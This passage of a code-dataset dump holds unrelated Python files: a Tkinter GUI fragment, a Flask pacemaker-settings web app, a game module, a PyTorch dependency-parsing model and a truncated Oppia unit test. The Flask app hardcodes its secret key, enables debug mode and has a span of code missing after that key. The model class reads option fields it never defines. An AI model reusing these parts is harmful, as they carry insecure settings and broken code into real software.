Tk()\r\nroot.geometry('400x400+360+200')\r\nroot.title('Text Generation')\r\ntext = Text(width=45, height=15)\r\ntext.place(x=10,y=130)\r\nscroll = Scrollbar(command=text.yview)\r\nscroll.place(x=370, y=130)\r\ntext.config(yscrollcommand=scroll.set)\r\nlabel1=Label(root,width=17, height=2,text='Training set')\r\ntext1=Entry(root,bd=5,width=25)\r\ntext1.place(x=10,y=30)\r\nlabel1.place(x=8,y=4)\r\nlabel2=Label(root,width=13, height=2,text='Program code')\r\nlabel2.place(x=8, y=65)\r\ntext2=Entry(root,bd=5,width=25)\r\ntext2.place(x=10, y = 90)\r\nb1 = 
Button(text=\"...\", command=insertText1)\r\nb1.place(x=180, y=30)\r\nb2 = Button(text=\"...\", command=insertText2)\r\nb2.place(x=180, y=90)\r\nbutton1=Button(text= 'LEARN',width=10, command=ButtonLearn)\r\nbutton1.place(x=230, y=30)\r\nbutton2=Button(text=\"ANALYZE\", width=10, command=ButtonAnalyze)\r\nbutton2.place(x=230, y=90)\r\nroot.mainloop()\r\n","sub_path":"analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":7704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"535023488","text":"import json\nfrom flask import Flask, render_template, request, redirect, url_for, session\nimport sqlite3\nimport serial\nimport database as db\nimport utils\n#import serial_utils\nimport dummy_serial_utils as serial_utils\n\nparameter_ranges = {\n 'lower_rate_limit': {\"range\": [50, 90], \"type\": int},\n 'atrial_amplitude': {\"range\": [65, 75], \"type\": int},\n 'atrial_pulse_width': {\"range\": [1, 30], \"type\": int}, # ms\n 'atrial_sensitivity': {\"range\": [25, 100], \"type\": float},\n 'arp': {\"range\": [150, 500], \"type\": int},\n 'ventricle_amplitude': {\"range\": [65, 75], \"type\": int},\n 'ventricle_pulse_width': {\"range\": [1, 30], \"type\": int},\n 'ventricle_sensitivity': {\"range\": [25, 100], \"type\": float},\n 'vrp': {\"range\": [150, 500], \"type\": int},\n 'max_sens_rate': {\"range\": [50, 175], \"type\": int},\n 'activity_threshold': {\"range\": [0, 200], \"type\": int},\n 'reaction_time': {\"range\": [0, 200], \"type\": int},\n 'response_factor': {\"range\": [1, 20], \"type\": int},\n 'recovery_time': {\"range\": [0, 200], \"type\": int},\n 'fixed_av_delay': {'range': [70, 300], \"type\": int}\n}\n\n# Set up the server\napp = Flask(__name__)\napp.secret_key = b'!@#$RFBNKOI*&^%RESXCVBNKLOI*&^%ESXCVBNK= 10:\n return render_template('signup.html', signup_failed=True, error_msg=\"too many users registered\")\n if request.form['username'] and request.form['password']:\n try:\n db.create_user((request.form['username'], request.form['password']))\n return redirect(url_for('login'))\n except sqlite3.IntegrityError as e:\n print(e)\n return render_template('signup.html', signup_failed=True,\n error_msg=\"unsuccessful registration, try again\")\n return render_template('signup.html', signup_failed=True, error_msg=\"no username or password entered\")\n\n\n# If user navigates to /login (method == get), serve the login\n# page. If user is already logged in, redirect to /dcm\n\n# If user submits their login information (method == post),\n# check if the user's information is valid. 
If valid, send to the dcm page.\n# If not, send them back to the login page with a notification\n@app.route('/login', methods=['POST', 'GET'])\ndef login():\n if request.method == 'GET':\n if \"user\" not in session:\n return render_template('index.html',\n login_failed=\n False if 'login_failed' not in request.args\n else request.args['login_failed']\n )\n else:\n return redirect(url_for(\"dcm_view\"))\n\n if request.method == 'POST':\n\n # check if login input is valid\n user = utils.check_credentials(request.form['username'], request.form['password'])\n\n if user:\n session[\"device_id\"] = 0\n session[\"user\"] = user\n return redirect(url_for(\"dcm_view\"))\n else:\n return redirect(url_for('login', login_failed=True))\n\n\n@app.route('/logout', methods=['POST'])\ndef logout():\n session.pop(\"user\")\n session.pop(\"device_id\")\n return redirect(\"/\")\n\n\n@app.route('/connection_update', methods=['POST'])\ndef connect():\n session[\"serial_port\"] = request.form[\"serial_port\"]\n ser.port = session[\"serial_port\"]\n try:\n session['device_id'] = serial_utils.get_device_id(ser)\n except serial.serialutil.SerialException:\n session['device_id'] = None\n session[\"serial_port\"] = \"Failed To Connect\"\n return redirect(\"/dcm\")\n\n\n# Show the user the page with dcm settings. Clicking a different mode\n# shows a different submission form with the valid parameters (see dcm.html)\n@app.route('/dcm', methods=['GET'])\ndef dcm_view():\n if \"user\" not in session:\n return redirect(url_for(\"landing_page\"))\n else:\n device_id = None if \"device_id\" not in session else session[\"device_id\"]\n user_stored_params = db.get_user_params(session[\"user\"], device_id)\n submission_success = None if 'submission_success' not in request.args else request.args['submission_success']\n invalid_parameters = None if 'invalid_parameters' not in request.args else request.args['invalid_parameters']\n serial_port = \"None\" if \"serial_port\" not in session else session[\"serial_port\"]\n return render_template('dcm.html',\n device_id=device_id,\n user=session[\"user\"],\n stored_params=user_stored_params,\n submission_success=submission_success,\n invalid_parameters=invalid_parameters,\n serial_port=serial_port,\n parameter_ranges=parameter_ranges\n )\n\n\n# After submitting a form on the dcm page, the results are posted here.\n# The parameters are checked if they are within predefined valid ranges, and\n# if they are not, send the user a message with which parameters are out of the range.\n\n# TODO: Add serial communication to send the parameters sent to this method to simulink using ser.write()\n# TODO: Parameters are accessed with request.form[parameter]\n@app.route('/submit-params/', methods=['POST'])\ndef submit_params(mode):\n invalid_parameters = utils.check_invalid_parameters(request.form, mode, parameter_ranges)\n print(\"invalid_parameters\")\n print(invalid_parameters)\n if invalid_parameters or not session['device_id']:\n return redirect(url_for(\"dcm_view\",\n submission_success=False,\n invalid_parameters=invalid_parameters)\n )\n (parameters, parameter_dict) = utils.build_parameters(mode, request.form)\n db.create_parameters(parameters, session['user'], session['device_id'])\n\n try:\n if not serial_utils.set_device_params(ser, parameter_dict):\n raise serial.serialutil.SerialException\n except serial.serialutil.SerialException:\n session['device_id'] = None\n return redirect(url_for(\"dcm_view\",\n submission_success=False,\n invalid_parameters=invalid_parameters)\n )\n # TODO: This 
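For context on the submit_params handler above: check_invalid_parameters is imported from the project's local utils module, which this record does not include. A plausible sketch of such a validator, written against the parameter_ranges table defined at the top of this file, might look like the following; the body is an assumption for illustration, not the project's actual code.

def check_invalid_parameters(form, mode, ranges):
    """Hypothetical sketch: collect submitted fields that fall outside their range."""
    invalid = []
    for name, spec in ranges.items():
        if name not in form:
            continue  # fields not used by the selected mode are simply absent
        lo, hi = spec["range"]
        try:
            value = spec["type"](form[name])  # coerce to int/float per the table
        except ValueError:
            invalid.append(name)
            continue
        if not (lo <= value <= hi):
            invalid.append(name)
    # mode could further restrict which fields apply; this sketch checks
    # whatever was submitted
    return invalid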
is where to put the serial communication\n    print(request.form)\n\n    return redirect(url_for(\"dcm_view\",\n                             submission_success=True,\n                             invalid_parameters=invalid_parameters)\n                    )\n\n\n@app.route('/get_egram_data', methods=['GET'])\ndef get_egram_data():\n    # fix: start with empty channels so the JSON response below stays valid even\n    # when the serial read fails (the original initialized this to 0, which\n    # raises a TypeError on egram_data['atrium'] in the error path)\n    egram_data = {'atrium': [], 'ventricle': []}\n    try:\n        egram_data = serial_utils.receive_egram_transmission(ser)\n        serial_success = 200\n    except serial.serialutil.SerialException:\n        serial_success = 500\n    return app.response_class(\n        response=json.dumps(\n            {'status': serial_success, 'atrium': egram_data['atrium'], 'ventricle': egram_data['ventricle']}),\n        mimetype='application/json'\n    )\n\n\nif __name__ == '__main__':\n    app.run(debug=True)\n","sub_path":"DCM-group1/src/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"122870612","text":"#coding:utf8\r\n'''\r\nCreated on 2014-1-17\r\n\r\n@author: CC\r\n'''\r\n\r\nfrom app.game.core.GamersManager import GamersManager\r\n\r\ndef roleInfo(dynamicId,characterId):\r\n\t'''Get the character's status-bar info\r\n\t@param userId: int user id\r\n\t@param characterId: the character's id\r\n\t'''\r\n\tgamer=GamersManager().getGamerBydynamicId(dynamicId)\r\n\tif dynamicId!=gamer.getDynamicId():\r\n\t\treturn {'result':False,'message':\"character does not exist\"}\r\n\tgamerinfo=gamer.formatInfo()\r\n\tresponsedata={'result':True,'message':'','data':{'characterId':gamerinfo['id'],'rolename':gamerinfo['nickname'],'level':gamerinfo['level'],'exp':gamerinfo['exp'],'maxexp':gamerinfo['maxExp'],'gamecoin':gamerinfo['gamecoin'],'coin':gamerinfo['coin'],'energy':gamerinfo['energy'],'maxenergy':gamerinfo['energy'],'power':gamerinfo['power'],'photo':gamerinfo['photo'],'repute':gamerinfo['repute'],'trainpoint':gamerinfo['trainpoint'],'zenid':gamerinfo['zenid'],'tacticspoint':gamerinfo['tacticspoint']}}\r\n\treturn responsedata\r\n\r\ndef calPower(dynamicId,characterId):\r\n\t''''''\r\n\tgamer=GamersManager().getGamerBydynamicId(dynamicId)\r\n\tif dynamicId!=gamer.getDynamicId():\r\n\t\treturn {'result':False,'message':\"character does not exist\"}\r\n\tresult=gamer.CalPower()\r\n\treturn result\r\n","sub_path":"app/game/appinterface/roleinfo.py","file_name":"roleinfo.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"256015167","text":"import os\nimport typing\nfrom dataclasses import dataclass\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom module.dmv import DMVOptions\nfrom utils.functions import make_mask, cp_mask_merge\nfrom utils.common import *\n\n\n@dataclass\nclass NeuralMOptions:\n    # MStepModel\n    num_lex: int = 0  # in dmv, no need to distinguish lex and pos for l-ndmv\n    num_lan: int = 1\n\n    dim_pos_emb: int = 10\n    dim_word_emb: int = 200\n    dim_valence_emb: int = 10\n    dim_direction_emb: int = 1\n    dim_lan_emb: int = 5\n\n    dim_hidden: int = 15\n    dim_pre_out_decision: int = 5\n    dim_pre_out_child: int = 12\n\n    dropout: float = 0.2\n    optimizer: str = \"adam\"\n    lr: float = 0.01\n    lr_decay_rate: float = 1.\n    min_lr: float = 0.01\n\n    encoder_mode: str = 'empty'\n    encoder_lstm_dim_hidden: int = 200\n    encoder_lstm_num_layers: int = 2\n    encoder_lstm_dropout: float = 0.2\n\n    use_pos_emb: bool = False\n    use_word_emb: bool = False\n    use_valence_emb: bool = False\n    share_valence_emb: bool = False\n    use_direction_emb: bool = False  # if False, use diff linear for diff directions\n    use_sentence_emb: bool = False\n    use_lan_emb: bool = False\n\n    freeze_word_emb: bool = 
False\n\n # if True, child_out_linear`s weight will be binded with POS emb and WORD emb(if available).\n # described in NDMV, L-NDMV.\n # if False, child_out_linear`s weight will be randomness\n use_emb_as_w: bool = False\n use_child_pos_emb: bool = False\n\n\nclass Encoder(nn.Module):\n def __init__(self, emb: nn.Embedding, is_pretrained_emb=False):\n super().__init__()\n self.emb = emb\n self.net = None\n self.reset_func = None\n self.out_dim = 0\n self.is_pretrained_emb = is_pretrained_emb\n if self.is_pretrained_emb and emb.weight.requires_grad:\n self._saved_emb = self.emb.weight.data.clone()\n else:\n self._saved_emb = None\n\n def forward(self, word_array, len_array):\n h = self.emb(word_array)\n h = self.net(h, len_array)\n return h\n\n def build_empty_encoder(self):\n def encode(h, len_array):\n return h\n\n def reset():\n return\n\n self.net = encode\n self.reset_func = reset\n self.out_dim = self.emb.weight.shape[1]\n\n def build_lstm_encoder(self, hidden_dim, num_layers, dropout):\n net = nn.LSTM(self.emb.weight.shape[1], hidden_dim // 2,\n num_layers, dropout=dropout, bidirectional=True)\n self.add_module('lstm_encoder', net)\n\n # noinspection PyTypeChecker\n def encode(h, len_array):\n batch_size, max_len, *_ = h.shape\n h = h.transpose(1, 0).contiguous()\n h = nn.utils.rnn.pack_padded_sequence(\n h, len_array, enforce_sorted=False)\n h = net(h)[0]\n h = nn.utils.rnn.pad_packed_sequence(h)[0]\n h = h.transpose(1, 0).contiguous()\n return h\n\n def reset():\n net.reset_parameters()\n\n self.net = encode\n self.reset_func = reset\n self.out_dim = hidden_dim\n\n def reset(self):\n assert self.reset_func is not None, 'reset is undefined'\n self.reset_func()\n if self._saved_emb is not None:\n self.emb.weight.data[:] = self._saved_emb\n else:\n self.emb.reset_parameters()\n\n def __call__(self, *args, **kwargs) -> typing.Any:\n return super().__call__(*args, **kwargs)\n\n\nclass NeuralM(nn.Module):\n def __init__(self, o: NeuralMOptions):\n super().__init__()\n self.o = o\n self.mode = o.e_step_mode\n self.use_direction_emb = o.use_direction_emb\n\n self.num_lex = o.num_lex\n self.num_pos = o.num_tag - self.num_lex\n self.cv = o.cv\n\n self.emb_dim = 0\n self.hidden_dim = o.dim_hidden\n\n if self.num_lex > 0:\n self.word_idx, self.pos_idx = None, None\n\n assert o.use_word_emb or o.use_pos_emb\n\n if o.use_word_emb:\n if hasattr(self.o, 'emb_path') and self.o.emb_path:\n word_emb = nn.Parameter(torch.tensor(np.load(self.o.emb_path), dtype=torch.float))\n word_emb.requires_grad = not o.freeze_word_emb\n else:\n word_emb = nn.Parameter(torch.empty(self.o.num_lex + 2, self.o.dim_word_emb))\n nn.init.normal_(word_emb)\n word_emb = nn.Embedding.from_pretrained(word_emb)\n self.word_encoder: Encoder = Encoder(word_emb)\n if o.encoder_mode == 'lstm':\n self.word_encoder.build_lstm_encoder(o.encoder_lstm_dim_hidden, o.encoder_lstm_num_layers,\n o.encoder_lstm_dropout)\n elif o.encoder_mode == 'empty':\n self.word_encoder.build_empty_encoder()\n else:\n raise ValueError(\"the encoder only supports (lstm, empty)\")\n self.emb_dim += self.word_encoder.out_dim\n else:\n self.word_encoder = None\n\n if o.use_sentence_emb:\n assert o.use_word_emb, 'if use sentence emb, must use word emb'\n self.emb_dim += self.word_encoder.out_dim\n\n if o.use_pos_emb:\n self.pos_encoder: Encoder = Encoder(nn.Embedding(self.num_pos, o.dim_pos_emb))\n self.pos_encoder.build_empty_encoder()\n self.emb_dim += self.pos_encoder.out_dim\n else:\n self.pos_encoder = None\n\n if o.use_lan_emb:\n assert o.num_lan > 1, 
'meanless option'\n self.lan_emb = nn.Embedding(o.num_lan, o.dim_lan_emb)\n self.emb_dim += o.dim_lan_emb\n\n if o.use_valence_emb:\n if o.share_valence_emb and self.cv == 2:\n self.cv_emb = nn.Embedding(2, o.dim_valence_emb)\n self.dv_emb = self.cv_emb\n else:\n if o.share_valence_emb:\n print('share_valence_emb reset to False because need the same num of valence')\n self.cv_emb = nn.Embedding(self.cv, o.dim_valence_emb)\n self.dv_emb = nn.Embedding(2, o.dim_valence_emb)\n self.emb_dim += o.dim_valence_emb\n else:\n self.cv_emb, self.dv_emb = None, None\n\n # must be the last emb because here will init nn.\n if self.use_direction_emb:\n self.direction_emb = nn.Embedding(2, self.direction_dim)\n self.emb_dim += self.direction_dim\n self.emb_linear = nn.Linear(self.emb_dim, self.hidden_dim)\n self.left_right_linear = None\n else:\n self.direction_emb, self.emb_linear = None, None\n self.left_right_linear = nn.Linear(self.emb_dim, 2 * self.hidden_dim)\n\n self.decision_linear = nn.Linear(self.hidden_dim, o.dim_pre_out_decision)\n self.decision_out_linear = nn.Linear(o.dim_pre_out_decision, 2)\n\n if o.use_emb_as_w:\n w_dim = 0\n # if o.use_pos_emb:\n # w_dim += o.dim_pos_emb\n if o.use_word_emb:\n w_dim += o.dim_word_emb\n if self.o.dim_pre_out_child != w_dim:\n print(f\"overwrite o.dim_pre_out_child to {w_dim} because o.use_emb_as_w = True\")\n o.dim_pre_out_child = w_dim\n\n if hasattr(self.o, 'pos_emb_path') and self.o.pos_emb_path:\n self.pos_emb_out = nn.Parameter(torch.tensor(np.load(self.o.pos_emb_path), dtype=torch.float))\n else:\n self.pos_emb_out = nn.Parameter(torch.empty(self.num_pos, o.dim_pre_out_child))\n nn.init.normal_(self.pos_emb_out.data)\n\n self.child_linear = nn.Linear(self.hidden_dim, o.dim_pre_out_child)\n self.child_out_linear = None # see build_child_out_linear\n self.child_pos_emb = None\n else:\n self.child_linear = nn.Linear(self.hidden_dim, o.dim_pre_out_child)\n self.child_out_linear = nn.Linear(o.dim_pre_out_child, o.num_tag)\n\n self.activate = F.relu\n self.dropout = nn.Dropout(o.dropout)\n\n self.optimizer_name = o.optimizer\n self.lr = o.lr\n self.lr_decay = o.lr_decay_rate\n if o.optimizer == 'adam':\n self.optimizer = torch.optim.Adam(self.parameters(), lr=o.lr)\n elif o.optimizer == 'sgd':\n self.optimizer = torch.optim.SGD(self.parameters(), lr=o.lr)\n else:\n self.optimizer = None\n\n def forward(self, arrays, group_ids, traces=None):\n \"\"\"\n :param arrays:\n a dict which contains arrays. 
'id' and 'len' is necessary.\n There are a series of use_X_emb in options to control the usage of arrays.\n :param group_ids:\n a array indicate word`s tag used in dmv, if num_lex=0,\n group_ids should be the same as pos_array .\n :param traces:\n a dict which contains traces.\n If given, forward in 'train' mode, or forward in 'predict' mode\n :return:\n \"\"\"\n len_array = arrays['len']\n batch_size = len(len_array)\n max_len = arrays['pos'].shape[1]\n\n to_expand = []\n if self.o.use_pos_emb:\n to_expand.append(self.pos_encoder(arrays['pos'], len_array))\n if self.o.use_word_emb:\n encoded_word = self.word_encoder(arrays['word'], len_array)\n to_expand.append(encoded_word)\n\n if self.o.use_sentence_emb:\n direction_splitted = encoded_word.view(batch_size, max_len, 2, -1)\n sentence = torch.cat([direction_splitted[torch.arange(batch_size), len_array - 1, 0, :],\n direction_splitted[:, 0, 1, :]], -1)\n to_expand.append(sentence)\n\n len_mask = make_mask(len_array, max_len)\n\n if traces is None:\n expanded, d, v, _ = self.prepare_decision(\n to_expand, len_mask, batch_size, max_len)\n decision_param = self.real_forward(\n expanded[:], d, v, True).reshape(batch_size, max_len, 2, 2, 2)\n\n if self.cv != 2:\n expanded, d, v, _ = self.prepare_trainsition(\n to_expand, len_mask, batch_size, max_len)\n h = self.real_forward(expanded, d, v, False)\n transition_param = self.transition_param_helper(group_ids, h, valid_direction=True)\n\n return decision_param, transition_param\n\n loss = torch.tensor(0., device='cuda')\n\n decision_trace = traces['decision']\n # decision_mask = torch.ones(decision_trace.shape, device='cuda', dtype=torch.bool)\n # decision_mask[:, 0, 0, :, GO] = 0\n # decision_mask[torch.arange(batch_size), len_array - 1, 1, :, GO] = 0\n decision_trace = decision_trace.view(-1)\n\n expanded, d, v, mask = self.prepare_decision(\n to_expand, len_mask, batch_size, max_len)\n h = self.real_forward(expanded[:], d, v, True).view(-1)\n loss += self.loss(h, decision_trace, mask) # & decision_mask.view(-1))\n\n transition_trace = traces['transition']\n # trace_mask = torch.ones(traces['transition'].shape, device='cuda', dtype=torch.bool)\n # for i in range(max_len):\n # trace_mask[:, i, :i + 1, 1] = 0\n # trace_mask[:, i, i:, 0] = 0\n transition_trace = transition_trace.view(-1)\n\n if self.cv != 2:\n expanded, d, v, mask = self.prepare_trainsition(\n to_expand, len_mask, batch_size, max_len)\n else:\n *_, mask = self.prepare_trainsition(to_expand,\n len_mask, batch_size, max_len, only_mask=True)\n h = self.real_forward(expanded, d, v, False)\n h = self.transition_param_helper(group_ids, h, valid_direction=False).view(-1)\n loss += self.loss(h, transition_trace, mask) # & trace_mask.view(-1))\n return loss\n\n def real_forward(self, emb_buffer, direction, valence, is_decision):\n emb_buffer.append(self.dv_emb(valence)\n if is_decision else self.cv_emb(valence))\n if self.use_direction_emb:\n emb_buffer.append(self.direction_emb(direction))\n h = torch.cat(emb_buffer, dim=-1)\n del emb_buffer\n\n h = self.dropout(h)\n if self.use_direction_emb:\n h = self.activate(self.emb_linear(h))\n else:\n left_right_h = self.activate(self.left_right_linear(h))\n left_h = left_right_h[:, :self.o.dim_hidden]\n right_h = left_right_h[:, self.o.dim_hidden:]\n left_h[direction == 1, :] = 0.\n right_h[direction == 0, :] = 0.\n h = left_h + right_h\n del left_h, right_h, left_right_h\n\n h = self.dropout(h)\n if is_decision:\n h = self.decision_out_linear(\n self.activate(self.decision_linear(h)))\n else:\n 
if self.o.use_emb_as_w:\n # w_pos = self.child_pos_emb(self.pos_idx)\n w_word = torch.cat(\n [self.pos_emb_out, self.word_encoder.emb(self.word_idx)])\n # w = torch.cat([w_pos, w_word], dim=1).T\n w = w_word.T\n h = torch.mm(self.activate(self.child_linear(h)), w)\n else:\n h = self.child_out_linear(self.activate(self.child_linear(h)))\n return torch.log_softmax(h, dim=-1)\n\n @staticmethod\n def loss(forward_out, target_count, mask):\n batch_loss = -torch.sum(target_count * forward_out * mask) / torch.sum(mask)\n return batch_loss\n\n @staticmethod\n def prepare_decision(arrays_to_expand, mask, batch_size, max_len):\n # arrays in arrays_to_expand should has shape (batch_size, hidden) or (batch_size, max_len, hidden)\n expanded = []\n for array in arrays_to_expand:\n array = array.view(batch_size, -1, 1, array.shape[-1])\n array = array.expand(-1, max_len, 4, -1)\n array = array.reshape(batch_size * max_len * 4, -1)\n expanded.append(array)\n\n direction_array = torch.zeros(\n batch_size * max_len, 2, 2, dtype=torch.long, device='cuda')\n direction_array[:, 1, :] = 1\n direction_array = direction_array.view(-1)\n\n valence_array = torch.zeros(\n batch_size * max_len * 2, 2, dtype=torch.long, device='cuda')\n valence_array[:, 1] = 1\n valence_array = valence_array.view(-1)\n\n mask = mask.unsqueeze(-1).expand(-1, -1, 8).reshape(-1)\n return expanded, direction_array, valence_array, mask\n\n def prepare_trainsition(self, arrays_to_expand, mask, batch_size, max_len, only_mask=False):\n if only_mask is False:\n expanded = []\n for array in arrays_to_expand:\n array = array.view(batch_size, -1, 1, array.shape[-1])\n array = array.expand(-1, max_len, 2 * self.cv, -1)\n array = array.reshape(batch_size * max_len * 2 * self.cv, -1)\n expanded.append(array)\n\n direction_array = torch.zeros(\n batch_size * max_len, 2, self.cv, dtype=torch.long, device='cuda')\n direction_array[:, 1, :] = 1\n direction_array = direction_array.view(-1)\n\n if self.cv == 2:\n valence_array = torch.zeros(\n batch_size * max_len * 2, self.cv, dtype=torch.long, device='cuda')\n valence_array[:, 1] = 1\n valence_array = valence_array.view(-1)\n else:\n valence_array = torch.zeros(\n batch_size * max_len * 2, dtype=torch.long, device='cuda')\n else:\n expanded, direction_array, valence_array = None, None, None\n\n mask = (mask.unsqueeze(2) & mask.unsqueeze(1)).unsqueeze(\n 3).expand(-1, -1, -1, 2 * self.cv).reshape(-1)\n return expanded, direction_array, valence_array, mask\n\n def transition_param_helper(self, group_ids, forward_output, valid_direction=False):\n \"\"\"convert (batch, seq_len, 2, self.cv, num_tag) to (batch, seq_len, seq_len, [direction,] self.cv)\"\"\"\n batch_size, max_len = group_ids.shape\n forward_output = forward_output.view(\n batch_size, max_len, 2, self.cv, self.o.num_tag)\n index = group_ids.view(batch_size, 1, 1, 1,\n max_len).expand(-1, max_len, 2, self.cv, -1)\n h = torch.gather(forward_output, 4, index).permute(\n 0, 1, 4, 2, 3).contiguous()\n if valid_direction:\n index = torch.ones(batch_size, max_len, max_len,\n 1, self.cv, dtype=torch.long, device='cuda')\n for i in range(max_len):\n index[:, i, :i] = 0\n h = torch.gather(h, 3, index).squeeze(3)\n return h\n\n def set_lex(self, word_idx, pos_idx):\n # assert w`ord_idx.shape == pos_idx.shape\n self.word_idx = word_idx\n # self.pos_idx = torch.cat(\n # [torch.arange(self.num_pos, device=pos_idx.device), pos_idx])\n if self.o.use_emb_as_w:\n if self.o.use_word_emb and self.o.freeze_word_emb:\n self.prefetched_word_emb = 
self.word_encoder.emb(word_idx)\n # if self.o.use_pos_emb:\n # self.child_pos_emb = nn.Embedding(\n # self.num_pos, self.pos_dim) if self.o.use_child_pos_emb else self.pos_encoder.emb\n\n def reduce_lr_rate(self):\n print('lr reduced')\n self.lr *= self.lr_decay\n for param_group in self.optimizer.param_groups:\n param_group['lr'] *= self.lr_decay\n\n def reset_lr_rate(self):\n self.lr = self.o.lr\n for param_group in self.optimizer.param_groups:\n param_group['lr'] *= self.lr\n\n def save(self, path):\n torch.save({'model_state_dict': self.state_dict()},\n os.path.join(path, 'model'))\n\n def load(self, path):\n self.load_state_dict(torch.load(os.path.join(path, 'model'))[\n 'model_state_dict'])\n\n def reset(self):\n if self.o.use_word_emb:\n self.word_encoder.reset()\n if self.o.use_pos_emb:\n self.pos_encoder.reset()\n if self.o.use_lan_emb:\n self.lan_emb.reset_parameters()\n if self.o.use_valence_emb:\n self.cv_emb.reset_parameters()\n if self.dv_emb is not self.cv_emb:\n self.dv_emb.reset_parameters()\n if self.use_direction_emb:\n self.direction_emb.reset_parameters()\n self.emb_linear.reset_parameters()\n else:\n self.left_right_linear.reset_parameters()\n\n self.decision_linear.reset_parameters()\n self.decision_out_linear.reset_parameters()\n\n self.child_linear.reset_parameters()\n if self.o.use_emb_as_w:\n # if self.o.use_pos_emb and self.o.use_child_pos_emb is True:\n # self.child_pos_emb.reset_parameters()\n nn.init.normal_(self.pos_emb_out.data)\n else:\n self.child_out_linear.reset_parameters()\n\n self.lr = self.o.lr\n self.optimizer = torch.optim.Adam(self.parameters(), lr=self.o.lr)\n\n def __call__(self, *args, **kwargs) -> typing.Any:\n return super().__call__(*args, **kwargs)\n","sub_path":"module/neural_m.py","file_name":"neural_m.py","file_ext":"py","file_size_in_byte":19265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"316569834","text":"# coding: utf-8\n#\n# Copyright 2013 Google Inc. 
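Stepping back to the Encoder class in the NeuralM record above: build_lstm_encoder packs the padded batch before running the LSTM so that padding positions never contribute to the hidden states, then unpacks afterwards. Here is a standalone round-trip of that pattern with toy data; batch_first is used for brevity, while the record itself works sequence-first.

import torch
import torch.nn as nn

# Toy batch: 3 sequences of embedding dim 8, padded to length 5; true lengths 5, 3, 2.
emb = torch.randn(3, 5, 8)
lengths = torch.tensor([5, 3, 2])
lstm = nn.LSTM(8, 4, batch_first=True, bidirectional=True)

packed = nn.utils.rnn.pack_padded_sequence(emb, lengths, batch_first=True,
                                           enforce_sorted=False)
out, _ = lstm(packed)
out, _ = nn.utils.rnn.pad_packed_sequence(out, batch_first=True)
print(out.shape)  # torch.Size([3, 5, 8]): hidden size 4 per direction, concatenated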
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS-IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n__author__ = 'Sean Lip'\n\nfrom oppia.apps.exploration.domain import Exploration\nimport oppia.apps.exploration.services as exp_services\nfrom oppia.apps.state.models import State\nfrom oppia.apps.widget.models import InteractiveWidget\n\nfrom django.utils import unittest\n\n\nclass FakeExploration(Exploration):\n \"\"\"Allows dummy explorations to be created and commited.\"\"\"\n\n def __init__(self, exp_id='fake_exploration_id', owner_id=None):\n \"\"\"Creates a dummy exploration.\"\"\"\n self.id = exp_id\n self.title = 'title'\n self.category = 'category'\n self.state_ids = []\n self.parameters = []\n self.is_public = False\n self.image_id = 'image_id'\n self.editor_ids = [owner_id] if owner_id else []\n\n def put(self):\n \"\"\"The put() method is patched to make no commits to the datastore.\"\"\"\n self._pre_put_hook()\n\n\nclass ExplorationDomainUnitTests(unittest.TestCase):\n \"\"\"Test the exploration domain object.\"\"\"\n\n def setUp(self):\n \"\"\"Loads the default widgets.\"\"\"\n super(ExplorationDomainUnitTests, self).setUp()\n InteractiveWidget.load_default_widgets()\n\n def tearDown(self):\n \"\"\"Deletes all widgets and explorations.\"\"\"\n InteractiveWidget.delete_all_widgets()\n explorations = exp_services.get_all_explorations()\n for exploration in explorations:\n exploration.delete()\n super(ExplorationDomainUnitTests, self).tearDown()\n\n def test_validation(self):\n \"\"\"Test validation of explorations.\"\"\"\n exploration = FakeExploration()\n\n # The 'state_ids property must be a non-empty list of strings\n # representing State ids.\n with self.assertRaises(Exploration.ObjectValidationError):\n exploration.state_ids = ['A string']\n exploration.put()\n\n # There must be at least one editor id.\n with self.assertRaises(Exploration.ObjectValidationError):\n exploration.put()\n\n def test_init_state_property(self):\n \"\"\"Test the init_state property.\"\"\"\n INIT_STATE_ID = 'init_state_id'\n INIT_STATE_NAME = 'init_state_name'\n\n init_state = State(id=INIT_STATE_ID, name=INIT_STATE_NAME)\n init_state.put()\n\n exploration = FakeExploration(owner_id='owner@example.com')\n exploration.state_ids = ['init_state_id']\n self.assertEqual(exploration.init_state_id, INIT_STATE_ID)\n self.assertEqual(exploration.init_state.name, INIT_STATE_NAME)\n\n exploration.add_state('b')\n self.assertEqual(exploration.init_state_id, INIT_STATE_ID)\n self.assertEqual(exploration.init_state.name, INIT_STATE_NAME)\n\n def test_is_demo_property(self):\n \"\"\"Test the is_demo property.\"\"\"\n demo = FakeExploration(exp_id='0')\n self.assertEqual(demo.is_demo, True)\n\n notdemo1 = FakeExploration(exp_id='a')\n self.assertEqual(notdemo1.is_demo, False)\n\n notdemo2 = FakeExploration(exp_id='abcd')\n self.assertEqual(notdemo2.is_demo, False)\n\n def test_is_owned_by(self):\n \"\"\"Test the is_owned_by() method.\"\"\"\n owner_id = 'owner@example.com'\n editor_id = 'editor@example.com'\n viewer_id = 
